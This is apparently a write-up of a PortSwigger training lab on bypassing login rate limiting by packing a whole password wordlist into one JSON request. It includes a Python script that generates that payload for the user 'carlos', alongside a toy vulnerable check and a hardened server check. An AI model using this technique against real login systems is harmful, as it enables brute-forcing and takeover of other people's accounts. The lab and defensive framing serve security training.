Broken Brute-Force Protection: How to Bypass Rate Limiting in a Single Request — Authentication…
Summary
The PortSwigger lab "Broken brute-force protection, multiple credentials per request" demonstrates a flaw in a login mechanism: the brute-force protection counts requests rather than credentials, so an attacker can bypass it by packing many password candidates into a single request.
The goal of the lab is to brute-force the password of the victim, whose username is carlos, and log in to his account.
A first attempt is the usual password spray: intercept the login request, identify the password parameter, right-click the request and send it to Burp Intruder, wrap the password value in the §§ payload markers, and paste the candidate passwords as the payload list.
This fails because the server rate-limits the login endpoint: after a few wrong passwords from the same IP it starts rejecting attempts. The attacker can instead build one request that carries the whole candidate list, using a small Python script with the structure import sys, def read_passwords(file_path), and def main().
Save the script as gen_pass.py, save the password list as passlist.txt, run the script, paste the generated request body (the password field now holding every candidate) into Burp Repeater, and observe the server response.
If one of the candidates is correct, the server responds with HTTP 302 and a session cookie for carlos, showing that the rate limit was bypassed with a single request and that the victim's account, and any sensitive data in it, is compromised.
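The following is an added example, not the article's own gen_pass.py: it reads a wordlist, builds one JSON login body whose password field is an array of candidates (the lab's login endpoint consumes JSON and checks each element), and pairs it with a constructed toy of the flawed server-side check beside a hardened one. The sample wordlist, the `vulnerable_check`/`hardened_check` functions and the attempt limit of 3 are assumptions for illustration; the real lab backend is not shown in the article.

```python
"""Build one login request carrying many password candidates.

Added example; not the original article's gen_pass.py.
Assumes the login endpoint accepts JSON and that the server
checks every element when "password" is an array.
"""
import hmac
import json
import sys

# Constructed sample wordlist standing in for passlist.txt (assumption).
SAMPLE_PASSLIST = """123456
password
12345678
qwerty

abc123
"""


def read_passwords(text):
    """Return the non-empty, stripped lines of a wordlist, one password per line."""
    return [line.strip() for line in text.splitlines() if line.strip()]


def build_login_body(username, password):
    """Build a JSON login body; pass a list to send every candidate in one request."""
    return json.dumps({"username": username, "password": password})


def login_succeeded(status_code):
    """The lab redirects (302) on a successful login; anything else means no hit."""
    return status_code == 302


# Toy server-side checks (constructed illustration, not the lab's real code).
def vulnerable_check(body, stored_password):
    """Flawed: accepts any JSON type and treats an array as a set of candidates,
    so one request can test the whole wordlist and counts as a single attempt."""
    candidate = json.loads(body)["password"]
    candidates = candidate if isinstance(candidate, list) else [candidate]
    return any(hmac.compare_digest(str(p), stored_password) for p in candidates)


def hardened_check(body, stored_password, attempts_so_far, max_attempts=3):
    """Hardened: the password must be a single string, the lockout is enforced
    before comparing, and every request consumes one attempt.
    Returns (success, updated_attempt_counter)."""
    candidate = json.loads(body).get("password")
    if attempts_so_far >= max_attempts:
        return False, attempts_so_far          # locked out, do not even compare
    if not isinstance(candidate, str):
        return False, attempts_so_far + 1      # reject arrays/objects outright
    ok = hmac.compare_digest(candidate, stored_password)
    return ok, (0 if ok else attempts_so_far + 1)


def main(argv):
    """Usage: python gen_pass.py [passlist.txt]; prints the body to paste into Repeater."""
    if len(argv) > 1:
        with open(argv[1], encoding="utf-8") as fh:
            words = read_passwords(fh.read())
    else:
        words = read_passwords(SAMPLE_PASSLIST)   # falls back to the sample list
    print(build_login_body("carlos", words))


if __name__ == "__main__":
    main(sys.argv)
```

Run it with the wordlist path, paste the printed body into the JSON login request in Repeater, and look for the 302. The hardened version shows the two controls the lab's server lacks: a type check on the password field and an attempt counter that is charged per request rather than per matching candidate.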